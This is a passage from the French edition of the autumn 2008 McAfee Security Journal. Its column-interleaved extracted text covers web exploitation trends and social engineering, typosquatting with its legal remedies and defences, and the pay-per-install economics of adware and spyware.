dans des logiciels largement répandus comme Apple QuickTime, logiciels clients sont légions, les pirates ont commencé à travailler
Adobe Flash Player ou Adobe Acrobat Reader. L'exploitation de manière systématique et coordonnée : ils commencent par
récente de la vulnérabilité touchant la fonction mailto: dans les infiltrer des sites web populaires, puis y implantent ensuite
fichiers PDF (CVE-2007-5020)11 et de la vulnérabilité liées au code furtivement leurs logiciels malveillants, et trompent ensuite les
Flash utilisant ActionScript (CVE-2007-0071) sont des exemples de internautes par des manœuvres relevant de l'ingénierie sociale.
failles critiques qui ont affecté des milliers d'utilisateurs.

32 McAFEE SECURITY JOURNAL


L'incident qui a eu lieu lors du Super Bowl (finale nationale de On pourrait croire que ces techniques arrivent à point nommé
football américain) en février 2007 en est un excellent exemple. Du pour tirer parti de l'ingénierie sociale comme vecteur d'attaque,
code JavaScript malveillant avait été introduit sur la page d'accueil et ce pour plusieurs raisons :
du site web officiel de l'évènement13. Ce script exploitait deux t Il n'existe à l'heure actuelle aucune méthode fiable et
failles présentes dans Internet Explorer et infectait les utilisateurs automatique permettant d'exécuter ces nouvelles techniques
dont le logiciel n'était pas à jour à l'aide d'un cheval de Troie (pour la propagation de masse notamment).
connecté à un serveur basé en Chine, permettant ainsi un accès
complet à l'ordinateur infecté. Des incidents identiques ont été t Elles peuvent être facilement testées sur des individus ou des
rapportés pour de nombreux sites web populaires, y compris des groupes ciblés par le biais de techniques d'ingénierie sociale
ambassades, des groupes de discussion ou des entreprises. dans le processus de développement.
Une autre menace émergente qui a rendu vulnérables des millions t Associées à l'ingénierie sociale, elles offrent un retour sur
de foyers fut l'exploitation de routeurs privés via la technologie investissement bien plus important qu'en procédant à des
Universal Plug-and-Play. L'attaque consistait à permettre à une page recherches supplémentaires dans le but d'une diffusion de masse.
web intégrant un fichier Flash malveillant de reconfigurer le routeur
de l'utilisateur14. (Ce qui a rendu cette attaque possible est le fait
qu'une grande majorité d'internautes utilisent les mots de passe Conclusion
par défaut sur leurs routeurs privés.) Une fois infecté, l'utilisateur Au vu des dernières tendances en matière de vulnérabilités,
se voyait proposer, par le biais d'un lien a priori inoffensif, de payer l'ingénierie sociale est un phénomène contre lequel il est très
ses factures en ligne ou d'accéder à plus d'informations sur un sujet difficile de lutter. Quels que soient les mécanismes de protection
susceptible de l'intéresser. Dans la plupart des cas, l'utilisateur ne se que les fournisseurs choisiront d'intégrer à leurs logiciels ou
doutait aucunement que son routeur avait été touché et que toutes systèmes d'exploitation, les techniques d'ingénierie sociale les
les informations transitant par celui-ci, y compris ses mots de passe, plus efficaces pourront les contourner tant que les utilisateurs
étaient envoyées à un tiers. continueront à cliquer sur tous les liens qu'ils rencontrent. Il n'est
pas non plus question de compter à court terme sur une législation
Nouveaux vecteurs d'exploitation du cyberespace pour combattre ces nouvelles techniques (sauf dans
le cas d'un dépôt de plainte pour fraude). Notre meilleure chance
Au début de la décennie, nous avons assisté à l'exploitation de limiter les pertes et l'impact sur des victimes trop confiantes
intensive de failles et de vulnérabilités (chaînes de format, Stack réside essentiellement dans une meilleure éducation de l'utilisateur.
Overflow, Heap Overflow, Integer Overflow) par des attaques
qui étaient d'un point de vue strictement technique relativement D'ici là, réfléchissez à deux fois avant de cliquer sur un lien
simples à mettre en œuvre. De nos jours, la plupart de ces attaques pour « accepter » le prix formidable que vous avez
fondées sur un simple dépassement de capacité de mémoire prétendument remporté.
de l'un ou l'autre composant ne sont cependant plus une réelle
menace pour les logiciels les plus courants, dont Windows,
grâce à l'amélioration des processus de développement et de
Rahul Kashyap dirige les services de Recherche sur
tests d'assurance qualité. De plus, des technologies comme la
les vulnérabilités et de Prévention des intrusions au
randomisation de l'espace d'adressage (ASLR) ont forcé les pirates sein de McAfee Avert Labs. Il est ainsi responsable
à abandonner les mécanismes d'exploitation traditionnels. des études sur les vulnérabilités, des analyses des
L'exploitation de vulnérabilités est entrée dans une nouvelle ère. attaques « jour zéro », du contenu des systèmes
Les concepts de pointeur NULL15 et de situation de concurrence16, de prévention des intrusions et des procédures
de réaction d'urgence. Kashyap est également un
mais aussi le développement de techniques d'exploitation fiables
grand fan du personnage de bande dessinée Dilbert
comme le « heap spray17 », se font de plus en plus populaires.
et espère un jour pouvoir créer sa propre série sur la
Beaucoup de ces bugs existent depuis longtemps mais avaient vie d'un expert en sécurité.
toujours été considérés comme inexploitables.

NOTES
1 http://www.microsoft.com/technet/security/current.aspx 10 « MS Office Flaws Ideal Tools for Targeted Attacks » (Les failles de MS Office sont
2 « How to Configure Memory Protection in Windows XP SP2 » des outils idéaux pour les attaques ciblées) — http://blog.washingtonpost.com/
(Configuration de la protection de la mémoire dans Windows XP SP2) — securityfix/2006/04/ms_office_flaws_ideal_tools_fo_1.html
http://www.microsoft.com/technet/security/prodtech/windowsxp/depcnfxp.mspx 11 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows/
3 « Analysis of GS protections in Microsoft Windows Vista » 12 « The New E-spionage Threat » (Cyberespionnage : la nouvelle menace) —
(Analyse des protections GS dans Microsoft Windows Vista) — http://www.businessweek.com/print/magazine/content/08_16/b4080032218430.htm
http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf 13 « Dolphins' Web sites hacked in advance of Super Bowl » (Sites web des
4 « Browser Fuzzing for fun and profit » (Le fuzzing de navigateurs, pour le plaisir Dolphins piratés en prévision du Super Bowl) — http://www.networkworld.com/
et pour l'argent) — http://blog.metasploit.com/2006/03/browser-fuzzing-for-fun- news/2007/020207-dolphins-web-sites-hacked-in.html
and-profit.html 14 « Hacking the interwebs » (Piratage Internet), 12 janvier 2008 —
5 « Month of Browser Bugs » (Le mois des bugs des navigateurs) — http://www.gnucitizen.org/blog/hacking-the-interwebs/
http://blog.metasploit.com/2006/07/month-of-browser-bugs.html 15 « Application-Specific Attacks: Leveraging the ActionScript Virtual Machine »
6 « AXFUZZ: An ActiveX/COM enumerator and fuzzer » (AXFUZZ : fuzzer et (Attaques ciblées sur des applications : exploitation de la machine virtuelle
énumérateur actif de code ActiveX et COM) — http://sourceforge.net/projects/axfuzz/ ActionScript) — http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf
7 « Hamachi », H D Moore et Aviv Raff — http://metasploit.com/users/hdm/tools/ 16 « Unusual Bugs » (Des bugs pas comme les autres), Ilja van Sprundel —
hamachi/hamachi.html http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf
8 « 637 million Users Vulnerable to Attack » (637 millions d'utilisateurs vulnérables aux 17 « Heap Feng Shui in JavaScript » (Feng Shui et Heap Overflow dans JavaScript) —
attaques), Frequency X — http://blogs.iss.net/archive/TheWebBrowserThreat.html http://www.determina.com/security.research/presentations/bh-eu07/
9 « Keep your operating system updated: Frequently asked questions » bh-eu07-sotirov-paper.html (Inscription obligatoire)
(Conservez votre système d'exploitation à jour : FAQ) —
http://www.microsoft.com/protect/computer/updates/faq.mspx

AUTOMNE 2008 33
Les itinéraires
inattendus de
la navigation
sur Internet
Benjamin Edelman

Une simple navigation innocente sur Internet peut vous exposer aux
nombreuses attaques décrites dans ce McAfee Security Journal.

Des bannières malveillantes aux logiciels publicitaires groupés, les sites navigateurs, qui ajoutent automatiquement le suffixe « .com » aux
que vous avez l'intention de visiter peuvent se révéler très dangereux. noms de domaine sans domaine de premier niveau, et enregistrent
Méfiez-vous toutefois aussi des sites que vous n'aviez aucunement ainsi des adresses de type « www.mcafeecom.com ». D'autres
prévu de consulter, mais sur lesquels vous tombez par accident. typosquatteurs préfèrent concentrer leurs efforts sur les préfixes
de type « http » ou enregistrer les domaines .com pour les sites
résidant justement dans d'autres domaines de premier niveau.
Stratégie de base Comment les utilisateurs sont-ils amenés sur ces sites détournés ?
Pour ceux d'entre nous qui sont parfois imprécis lorsqu'ils Certains utilisateurs oublient l'orthographe exacte de l'adresse d'un
saisissent une URL, il existe un type particulier de menace dont site, d'autres font des fautes de frappe. (Cela est particulièrement
ils doivent se méfier. Ce fléau, touchant principalement les vrai pour les utilisateurs ne parlant pas ou peu anglais, les
spécialistes des fautes de frappe, est appelé le « typosquatting » personnes ayant des problèmes de vue ou encore ceux qui ne sont
— de « typo », faute de frappe, et « squat », prendre abusivement pas tout à fait à l'aise avec un clavier.) Les utilisateurs débutants
possession d'un local vacant. La stratégie du typosquatteur peuvent ne pas connaître la syntaxe correcte de l'adresse d'un
consiste à anticiper les fautes de frappe pouvant être commises. site web, tandis que les plus pressés commettent des erreurs
Imaginez qu'en voulant saisir « bankofamerica.com », un d'inattention. Même les utilisateurs les plus chevronnés ne sont
utilisateur tape deux fois sur la touche « k » et omette le « e », pas à l'abri d'une erreur lorsqu'ils saisissent une URL à partir du
entrant ainsi l'adresse « bankkofamrica.com ». Ce type de coquille minuscule clavier d'un téléphone portable ou d'une tablette avec
entraînerait normalement un message d'erreur du navigateur et un reconnaissance d'écriture manuscrite, ou encore lorsqu'ils se
renvoi vers le site officiel de Bank of America. Imaginez maintenant trouvent en voiture sur une route accidentée. On ne peut ainsi en
qu'un typosquatteur ait anticipé cette erreur. Rien ne l'empêche en vouloir à personne d'entrer une adresse erronée et de se retrouver
effet d'enregistrer un nom de domaine sur la base d'une mauvaise sur un site utilisant une technique de typosquatting. Au contraire
orthographe (ou autres approximations) dans l'espoir que des d'ailleurs, car bien qu'il soit certain que ces sites sont visités par de
utilisateurs peu attentifs y atterrissent. nombreux utilisateurs, c'est généralement à la suite d'une erreur.
A l'origine, les typosquatteurs exploitaient principalement les
coquilles, qu'il s'agisse de caractères supplémentaires, manquants Etendue du phénomène
ou inversés. Depuis peu, ils font également appel à de nouvelles
Comptant sur la part importante d'utilisateurs commettant
méthodes peu orthodoxes pour récupérer tout ce trafic non
des erreurs, le typosquatting s'est développé de manière
intentionnel. Un typosquatteur peut en effet enregistrer le nom
remarquable. Le service McAfee SiteAdvisor® réalise en
de domaine « wwwmcafee.com », ce qui dirigerait vers son site
permanence des recherches sur les typosquatteurs. L'étude
tout utilisateur omettant le point séparant les trois w du nom de
réalisée par McAfee Avert Labs en mai 2008 a répertorié plus de
domaine dans l'URL « www.mcafee.com ». (Pour l'anecdote, ceci
80 000 domaines de typosquatting dérivés des 2 000 sites web
est réellement arrivé. McAfee fait en ce moment le nécessaire pour
les plus populaires. Et plus on creuse, plus on se rend compte de
récupérer ce nom de domaine.) Dans le cas des points de séparation,
l'ampleur du phénomène.
les typosquatteurs anticipent à juste titre le comportement des

34 McAFEE SECURITY JOURNAL


Les sites web fréquentés par les enfants sont des cibles de résolution de litiges en matière de noms de domaine
particulièrement privilégiées des typosquatteurs. Une analyse (UDRP, Uniform Domain Name Dispute Resolution Policy)
récente a par exemple démontré que 327 sites de typosquatting permet un arbitrage pour régler les plaintes éventuelles.
dérivés de « cartoonnetwork.com » avaient déjà été enregistrés. Pour enregistrer un site sur un domaine de premier niveau
Dans la liste établie par SiteAdvisor, « Freecreditreport.com » important, l'abonné doit accepter la juridiction de l'UDRP,
arrivait en tête des sites détournés, suivi par des sites tels que ce qui signifie que cette politique s'applique quel que soit le
YouTube, Craigslist, Wikipedia ou Bank of America. (La figure 1 pays où se trouve le domaine de typosquatting. Toutefois, les
propose quelques données statistiques. Pour des exemples de recours de l'UDRP sont limités à la confiscation du domaine
détournements orthographiques, voir l'annexe.) mis en cause, sans paiement de dommages éventuels.
Bien que l'ACPA prévoie d'importantes pénalités, les
Recours légaux typosquatteurs semblent avoir déjà compris que leur
application est peu probable. Ainsi, malgré la menace de
Quelles que soient ses formes, le typosquatting est une pratique lourdes sanctions financières, les typosquatteurs continuent
illégale aux Etats-Unis. La loi de protection des utilisateurs à œuvrer en toute impunité.
contre le cybersquattage (ACPA) de 1999 (15 USC §1125(d))
interdit l'enregistrement, le trafic et l'utilisation de noms de
domaine identiques ou d'une similarité portant à confusion Stratégie financière des typosquatteurs
avec des marques ou des noms connus. L'ACPA prévoit des Dès qu'un utilisateur arrive sur un site de typosquatting,
dommages à hauteur des profits engendrés de manière illicite son propriétaire met tout en œuvre pour gagner le plus
par le typosquatteur incriminé (15 USC §1117(a)(1)), ou allant de d'argent possible.
1 000 $ à 100 000 $ par domaine de typosquatting répertorié (à
la discrétion du tribunal) (§1117(d)). Il y a quelques années, le célèbre typosquatteur John
Zuccarini imposait à ses innocents visiteurs l'affichage de
Certains pays bénéficient d'une législation quelque peu différente sites web pour adultes. Zuccarini avait enregistré pas moins
en matière de typosquatting, mais la plupart d'entre eux de 8 000 domaines différents, comme j'ai pu le décrire dans
considèrent cette pratique comme une violation des droits de une précédente étude1. Celui-ci ne s'en est finalement pas
marque et l'interdisent de fait. En outre, la Politique uniformisée tiré à si bon compte : en septembre 2003, Zuccarini a été
arrêté pour violation de la loi sur l'intégrité des noms de
domaines (Truth in Domain Names Act), interdisant toute
NOMBRE DE DOMAINES action utilisant un nom de domaine trompeur dans le but
DOMAINE DE TYPOSQUATTING
d'amener une personne à visualiser des contenus obscènes.
freecreditreport.com 742
L'approche usuelle des typosquatteurs repose désormais sur
cartoonnetwork.com 327
la publicité. Parmi les milliers de domaines de typosquatting
youtube.com 320 que j'ai pu étudier ces dernières années, il est rare d'en
craigslist.org 318 rencontrer un qui n'affiche aucune publicité.

blogspot.com 276

clubpenguin.com 271

wikipedia.com 266

runescape.com 264
Le service McAfee SiteAdvisor réalise
miniclip.com 263
en permanence des recherches sur les
bankofamerica.com 251
typosquatteurs. L'étude réalisée par McAfee
dailymotion.com 250
Avert Labs en mai 2008 a répertorié plus de
metroflog.com 249
80 000 domaines de typosquatting dérivés
addictinggames.com 248

friendster.com 246
des 2 000 sites web les plus populaires.
myspace.com 239

verizonwireless.com 238

facebook.com 235

Figure 1 : Liste des sites les plus touchés par le typosquatting. Ce tableau répertorie
les marques les plus détournées par les typosquatteurs. Ces données sont tirées de
l'étude des analyses SiteAdvisor en mai 2008.

AUTOMNE 2008 35
Figure 2 : Un typosquatteur
a enregistré un nom de
domaine proche de celui d'une
banque connue, puis fait payer
(indirectement) ses espaces
publicitaires à cette même
banque et à d'autres.

Lorsque ces sites en présentent, les publicités ont généralement domaine de ce type et ce typosquatteur devrait même payer
été sélectionnées pour leur pertinence vis-à-vis du contenu d'importants dommages et intérêts à Bank of America si celle-ci
que l'utilisateur souhaitait vraisemblablement consulter. Si l'on portait plainte. Etonnamment, on constate que ce typosquatteur
reprend l'exemple de bankkofamrica.com cité précédemment, on facture en fait de l'espace publicitaire à Bank of America, dont on
peut s'attendre à ce que les publicités proposées concernent des peut supposer, au moins à l'origine, qu'elle n'était pas consciente
services bancaires. Oui, mais lesquels ? Avant tout bien sûr, on de cette entourloupe.
devrait trouver Bank of America (voir figure 2). Pas de surprise,
Comment cela est-il possible ? En fait, les typosquatteurs ne
donc. D'un côté, cette publicité s'avère bénéfique pour Bank
vendent pas directement leur espace publicitaire aux annonceurs.
of America : elle parvient quand même à toucher l'utilisateur,
(Imaginez la scène : « Bonjour, seriez-vous intéressés par un
malgré la faute de frappe empêchant la prise de contact initiale.
espace publicitaire sur notre site de typosquatting ? – Pardon ?? »)
D'autre part, il est assez incroyable qu'un typosquatteur fasse
Concrètement, les typosquatteurs vendent leurs services aux
payer Bank of America la possibilité de toucher un client qui
réseaux publicitaires, qui eux-mêmes recherchent des annonceurs.
souhaitait volontairement se rendre sur leur site. Après tout, ce
Le plus grand réseau de ce type est Google, dont le produit
typosquatteur ne fait rien d'autre que violer les droits de marque
AdSense for Domains et autres services de syndication pour
de Bank of America ; il se rend ainsi coupable d'une infraction
domaines gèrent, d'après les données relevées par SiteAdvisor, les
à l'ACPA, selon laquelle il est interdit d'enregistrer des noms de
publicités de plus de 80 % des sites de typosquatting.

36 McAFEE SECURITY JOURNAL


Evolution du phénomène de cette pratique, les typosquatteurs seraient nettement moins
motivés par l'enregistrement de domaines détournés, dans la
En juin 2008, l'ICANN (Internet Corporation for Assigned Names mesure où aucun autre réseau publicitaire ne les rémunèrerait
and Numbers) a voté l'accélération du processus de création aussi grassement que Google. (Pour information, j'interviens en
de nouveaux domaines de premier niveau. Outre les domaines tant que conseiller dans le procès Vulcan Golf contre Google,
familiers à la plupart des internautes, il existe déjà certains affaire pour violation des droits de marque portée en action
domaines moins connus comme .info, .biz, .museum et .travel. collective traitant de la responsabilité de Google dans les sites de
Nous pourrons bientôt compter avec de nouveaux domaines, typosquatting où Google achète des espaces publicitaires.)
tels que .nyc ou .lib (comme certains ont pu le suggérer).
Ces nouveaux domaines représentent bien évidemment de
nouvelles opportunités pour les typosquatteurs, qu'ils choisissent Moyens de défense
d'enregistrer de vrais noms de marques avec ces nouveaux Bien que la lutte contre le typosquatting continue, les
domaines ou misent sur d'autres erreurs typographiques. Lorsque internautes ont de nombreux moyens de protection à leur
les utilisateurs demanderont l'accès à des sites sur ces domaines, portée. Le plus important : être attentif à ce que l'on tape.
leurs erreurs les propulseront directement dans le giron des Méfiez-vous du typosquatting, surtout lorsque l'adresse d'un
typosquatteurs, déjà prêts à les accueillir avec leurs sites détournés. site est particulièrement difficile à orthographier. Si vous
Certains indices laissent cependant penser que le typosquatting ne connaissez pas un nom de domaine, n'essayez pas de le
pourrait connaître une perte de vitesse. D'une part, certains sites deviner ; passez plutôt par un moteur de recherche.
web importants ont mis en place des mesures de protection contre Ensuite, une fois arrivé sur un site, soyez vigilant. S'agit-il bien
les typosquatteurs, à la fois pour eux-mêmes et pour leurs clients. du site que vous souhaitiez visiter ? Le lien est-il bien un pointeur
Par exemple, en 2006 Neiman Marcus a porté plainte contre la ordinaire, ou s'agit-il d'une annonce publicitaire ? Le site d'une
société d'enregistrement de noms de domaine Dotster. Neiman administration publique devrait-il vraiment être en .com ? Ne
Marcus accusait Dotster d'avoir enregistré un grand nombre de devriez-vous pas plutôt consulter un site en .gov ? Avec un peu
domaines portant atteinte aux marques de Neiman Marcus, et de de sens critique, vous pourrez vous défendre efficacement contre
profiter des publicités affichées pour tirer d'importants bénéfices le typosquatting et d'autres menaces du même type.
de ces sites détournés. Neiman Marcus considérait que l'implication
de Dotster ne se limitait pas à l'enregistrement simple de ces Certains logiciels spécialisés peuvent également permettre de
domaines, dans la mesure où la société choisissait les domaines bénéficier d'une protection contre les typosquatteurs. SiteAdvisor
qu'elle enregistrait et tirait un avantage pécuniaire des publicités reconnaît de nombreux sites de ce type. Un service de résolution
diffusées sur ces sites. L'affaire fut classée en 2007 selon des des erreurs de frappe, comme OpenDNS, vous assure une
modalités confidentielles. Depuis, Neiman Marcus s'est attaqué à protection supplémentaire. Les moteurs de recherche sont eux
d'autres importants squatteurs. (Pour information, j'ai eu l'occasion aussi utiles, puisqu'ils proposent le plus souvent de corriger les
de conseiller Neiman Marcus pour certaines de ces affaires.) Verizon fautes les plus plausibles : vous pouvez ainsi éviter de nombreux
et Microsoft se sont également montrés vigilants dans des affaires sites de typosquatting en effectuant des recherches plutôt qu'en
semblables. D'un côté, ce type de procès n'est pas particulièrement tapant directement un nom de domaine directement dans la
courant. Toutefois, les dommages et intérêts prévus par l'ACPA, soit barre d'adresse de votre navigateur.
un minimum de 1 000 dollars par domaine, peuvent représenter
des sommes importantes dans le cas de violations à grande échelle.
A elle seule, la société Microsoft a reçu plus de deux millions de Benjamin Edelman est maître assistant à la
dollars dans le cadre d'affaires de typosquatting. Harvard Business School, où il étudie les sites
de marché électroniques et la fraude en ligne. Il
Certaines rumeurs persistances indiquent que de grands réseaux
est également conseiller spécial pour le service
publicitaires, Google notamment, pourraient se détourner de SiteAdvisor de McAfee, proposant un point de vue
l'industrie du typosquatting. Une affaire récente portée en action extérieur aux évaluations de sites effectuées par
collective a dénoncé le rôle de Google dans le financement de SiteAdvisor. Et même si sa technique de frappe est
ce secteur, et les publicités tirant parti du typosquatting ont été généralement irréprochable, le professeur Edelman
a parfois lui aussi emprunté les chemins de traverse
à l'origine de nombreuses plaintes impliquant annonceurs et
de la navigation Internet.
propriétaires de marques. Si Google cessait tout financement

NOTES ANNEXE
1 « Large-Scale Registration of Domains with Typographical Errors » Exemples de sites de typosquatting : Cartoonnetwork.com
(Enregistrement à grande échelle de noms de domaine contenant des erreurs Parmi les 80 000 domaines analysés en mai 2008 par SiteAdvisor, nous avons
typographiques), janvier 2003, Harvard Law School — identifié les variations suivantes du domaine « cartoonnetwork.com » :
http://cyber.law.harvard.edu/archived_content/people/edelman/typo-domains/
ccartoonnetwork.com ckartoonnetwork.com cairtoonnetwork.com
dcartoonnetwork.com jcartoonnetwork.com cuartoonnetwork.com
ncartoonnetwork.com vcartoonnetwork.com acartoonnetwork.com
cfartoonnetwork.com caertoonnetwork.com bcartoonnetwork.com
ceartoonnetwork.com caortoonnetwork.com canrtoonnetwork.com

AUTOMNE 2008 37
Qu'est-il donc arrivé
aux logiciels espions
et aux logiciels
publicitaires ?
Aditya Kapoor

Les logiciels espions et publicitaires font partie des outils les plus
utilisés pour la publicité et le marketing en ligne.

Ces applications sont souvent utilisées dans le cadre de techniques t Logiciel publicitaire Il s'agit d'un type de programme de
d'ingénierie sociale et phagocytent généralement des logiciels diffusion de publicités, dont l'objectif premier est de diffuser
gratuits (freewares) ou à contribution volontaire (sharewares), par du contenu publicitaire, mais selon des procédés et dans
ailleurs très utiles, téléchargés par les internautes. Ces applications des contextes généralement inattendus et non souhaités par
indésirables sont d'ailleurs fournies avec des contrats de licence l'utilisateur. Le modèle de risque défini par l'ASC décrit en
censés définir les limites de leur comportement. Ceux-ci sont détail divers comportements pouvant être considérés comme
toutefois rarement explicites et utilisables, trompant l'utilisateur et inattendus ou indésirables. De nombreuses applications
laissant le champ libre aux pièges de l'ingénierie sociale. publicitaires disposent également de fonctions de suivi et
peuvent, à ce titre, être qualifiées de technologies de suivi. Il
Au début de la décennie, les logiciels espions (spywares) et les est possible que certains utilisateurs veuillent supprimer des
logiciels publicitaires (adwares), souvent appelés « programmes logiciels publicitaires s'ils sont opposés à ce type de suivi, qu'ils
potentiellement indésirables », ont vu leur nombre augmenter ne souhaitent pas voir s'afficher les publicités proposées par
de manière exponentielle. Après 2005, on a cependant assisté à ces programmes ou qu'ils sont incommodés par leurs effets
un déclin constant de ce nombre. Dans le présent article, nous sur les performances de leur système. A l'inverse, il est possible
étudierons les principaux changements survenus dans les modèles que d'autres désirent conserver des logiciels publicitaires bien
de compensation en ligne qui ont joué un rôle important dans précis s'ils leur permettent de réduire le coût d'un produit ou
cette diminution. Les logiciels espions et logiciels publicitaires sont d'un service particulier, ou si le contenu publicitaire proposé
répartis en deux catégories bien distinctes : l'une comprend des leur semble utile et pertinent, comme des publicités sur des
applications plus saines et des modèles plus élaborés nécessitant produits concurrents ou complémentaires à ceux qu'il détient.
l'approbation de l'utilisateur, développés par des acteurs clés
dans le domaine des logiciels publicitaires ; l'autre comprend des
t Logiciel espion Stricto sensu, cette expression désigne un
logiciels parfois malveillants et souvent définis comme étant des logiciel de suivi déployé sans que l'utilisateur en soit averti,
chevaux de Troie. Cette distinction relativement claire a permis de sans son consentement et sans qu'il en ait la maîtrise. Au
limiter le nombre des logiciels espions et des logiciels publicitaires. sens large, les logiciels espions correspondent à ce que l'ASC
Cependant, si ces programmes potentiellement indésirables ne qualifie de « Spywares et autres technologies potentiellement
représentent plus une réelle menace, peut-on espérer les voir indésirables ». En d'autres mots, des technologies déployées
disparaître à tout jamais ? Pour répondre à cette question, nous sans le consentement préalable de l'utilisateur ou mises en
étudierons les changements qui ont eu lieu dans le paysage des œuvre de manière à limiter le contrôle de l'utilisateur sur :
menaces, ainsi que le rôle des techniques d'ingénierie sociale. – des modifications importantes affectant l'utilisation, la
confidentialité ou la sécurité du système ;
Définitions – l'utilisation des ressources système, y compris les
Les termes logiciel publicitaire (adware) et logiciel espion applications installées ;
(spyware) sont souvent utilisés de manière approximative ou
– la collecte, l'exploitation et la diffusion de données
comme s'ils étaient synonymes, ce qui entretient souvent la
personnelles ou sensibles.
confusion. Pour plus de clarté, nous avons choisi d'utiliser les
définitions établies par l'Anti-Spyware Coalition (ASC)1.

38 McAFEE SECURITY JOURNAL


Conscients que le terme générique de « logiciel espion » s'est Au fur et à mesure que le trafic et sa rémunération augmentent,
grandement éloigné de son sens d'origine, les membres de l'ASC Paul décide d'utiliser un exploit afin d'installer ce logiciel publicitaire
ont décidé de l'utiliser (au sens propre) pour les documents sans que l'utilisateur en ait conscience. De nombreuses applications
techniques. Conscients également du fait qu'il est impossible de ce type affichent un contrat de licence avant l'installation.
d'éviter les connotations associées à ce terme dans l'usage Considérant que cela ne ferait qu'apeurer les visiteurs, Paul décide
courant, l'ASC prend note de l'acception générale du terme de modifier l'application de manière à empêcher l'affichage de ce
comme incluant l'ensemble des programmes potentiellement contrat afin de multiplier le nombre d'installations. Si Paul s'avère
indésirables. Dans le présent article, le terme logiciel espion ne être un pirate chevronné, il pourra reproduire ce modèle sur des
sera jamais utilisé au sens large, mais toujours au sens propre, milliers de sites web infectés et décupler de manière exponentielle
désignant ainsi un logiciel utilisé à des fins de marketing. Pour les aussi bien le nombre d'installations que sa propre rémunération.
programmes espions au sens strict, comme les enregistreurs de Benjamin Edelman, également auteur pour McAfee Security
frappe, nous utiliserons le terme logiciels de surveillance. Journal, décrit un scénario similaire sur son site web5.
Le modèle de compensation avec paiement à l'installation
Un démarrage fulgurant s'est avéré très lucratif pour les programmeurs et les personnes
Les logiciels espions et logiciel publicitaires ont attiré notre malintentionnées, ce qui a contribué à la croissance exceptionnelle
attention au cours de l'année 2000 avec l'apparition d'Adware- du nombre de logiciels espions et de logiciels publicitaires. Dans ce
Aureate, qui utilisait l'historique de navigation de l'utilisateur modèle, de nombreux vecteurs d'installation sont utilisés. Ceux-ci
pour diffuser des publicités. Cet événement a entraîné la création peuvent être classés en deux catégories distinctes :
de l'une des premières applications de protection antispyware : t Ingénierie sociale Cette technique nécessite l'intervention
OptOut, par la Gibson Research Corporation2. de l'utilisateur non seulement dans l'installation d'un logiciel,
Ces logiciels ont connu leur essor fin 2004 et ont vu leur nombre mais parfois aussi dans sa diffusion. Le nombre de méthodes
exploser en 2005 (voir figures 1 et 2). Leur premier objectif d'ingénierie sociale n'a de limite que l'imagination des auteurs
était de générer des profits en étant installés sur des millions d'attaques, qui parviennent d'ailleurs souvent à tromper les
d'ordinateurs (selon le modèle avec paiement à l'installation) mais utilisateurs les plus avertis. Pour reprendre l'exemple de Paul
aussi en affichant des publicités (dans le cadre d'un paiement au Dupont, la perspective d'obtenir gratuitement des jeux ou des
clic). L'industrie des logiciels espions et des logiciels publicitaires a sonneries téléphoniques est une tentation à laquelle peu de
prospéré ces trois dernières années grâce aux importants revenus personnes savent résister. Quoi qu'il en soit, c'est à l'utilisateur
générés par la publicité. Chaque fois qu'un utilisateur cliquait sur de décider s'il accepte de prendre des risques ou de laisser aux
une publicité, la société émettrice recevait une commission. autres tous ces cadeaux qu'on lui propose gratuitement.

Modèles de compensation et mises en garde Logiciels


5 000 publicitaires

Les logiciels espions et logiciels publicitaires font appel à 4 000


deux modèles de compensation différents pour la publicité 3 000
en ligne. Dans un monde idéal, ces modèles fonctionneraient
2 000
parfaitement, mais quelle est réellement la situation dans un
monde où existent des personnes malintentionnées ? Examinons 1 000
un instant comment ces modèles peuvent être exploités. 0
2000 2001 2002 2003 2004 2005 2006 2007 2008
Paiement à l'installation : le modèle côté client3 (estimation)

Selon le modèle avec paiement à l'installation, des sociétés Figure 1 : Le nombre de logiciels publicitaires a atteint son apogée en 2005.
marchandes et de services paient des fournisseurs de logiciels (Source : McAfee Avert Labs)
publicitaires pour diffuser leurs annonces. Ces derniers font à
leur tour appel à des partenaires ou à des sociétés affiliées pour Logiciels espions et logiciels de surveillance
300
distribuer leurs logiciels publicitaires, notamment en les combinant
à d'autres applications. (Aux Etats-Unis par exemple, ZangoCash 250
paie entre 0,75 et 1,45 dollar pour chaque installation de son 200
logiciel publicitaire4.) Il ne reste alors plus qu'à attendre que le
150
logiciel soit installé sur l'ordinateur d'un utilisateur.
100
Selon ce modèle, un paramètre d'identification particulier est
utilisé pour détecter les installations effectuées. Ainsi, si Paul 50
Dupont héberge sur son site web le programme d'installation 0
d'un logiciel publicitaire avec paiement à l'installation, et qu'un 2000 2001 2002 2003 2004 2005 2006 2007 2008
utilisateur télécharge et installe ce logiciel via le site de Paul, (estimation)
ce dernier percevra une rémunération définie. Pour augmenter Logiciels espions
le nombre de téléchargements sur son site, Paul essaie alors Logiciels de surveillance
d'attirer de nouveaux visiteurs à l'aide de contenus attrayants, Figure 2 : Les logiciels espions et les logiciels de surveillance ont vu leur nombre
comme des titres accrocheurs, des images et vidéos pour adultes, diminuer globalement depuis 2005, mais nous devons nous attendre à une
ou encore des jeux et sonneries téléphoniques gratuits. recrudescence fin 2008. (Source : McAfee Avert Labs)

AUTOMNE 2008 39
t Exploits L'installation de logiciels publicitaires par le biais Les différents aspects de l'ingénierie sociale
d'exploits peut être effectuée sans intervention de l'utilisateur,
bien que celui-ci soit dans la plupart des cas appâté par des Les pirates informatiques s'attaqueront toujours au maillon le
techniques d'ingénierie sociale vers des sites web malveillants plus faible du système de sécurité, c'est-à-dire l'utilisateur lui-
hébergeant ces mêmes exploits. même. — Kevin Mitnick (2007)11
Quel que soit le modèle utilisé par les développeurs de logiciels
Paiement au clic : le modèle côté serveur6 publicitaires, le facteur de réussite principal reste l'utilisateur.
Dans l'exemple de Paul Dupont, les utilisateurs étaient infectés
Le modèle avec paiement au clic existe sous deux formes : les après avoir visité le site web malveillant, attirés par les stratégies
publicités sponsorisées et les publicités basées sur le contenu. d'ingénierie sociale de Paul. L'une des raisons pour lesquelles ces
Ce modèle ne requiert aucune installation de logiciel espion ou stratégies fonctionnent si bien est que la plupart des utilisateurs
de logiciel publicitaire sur l'ordinateur de l'utilisateur, mais peut font par nature confiance à ce qu'on leur présente et ne se méfient
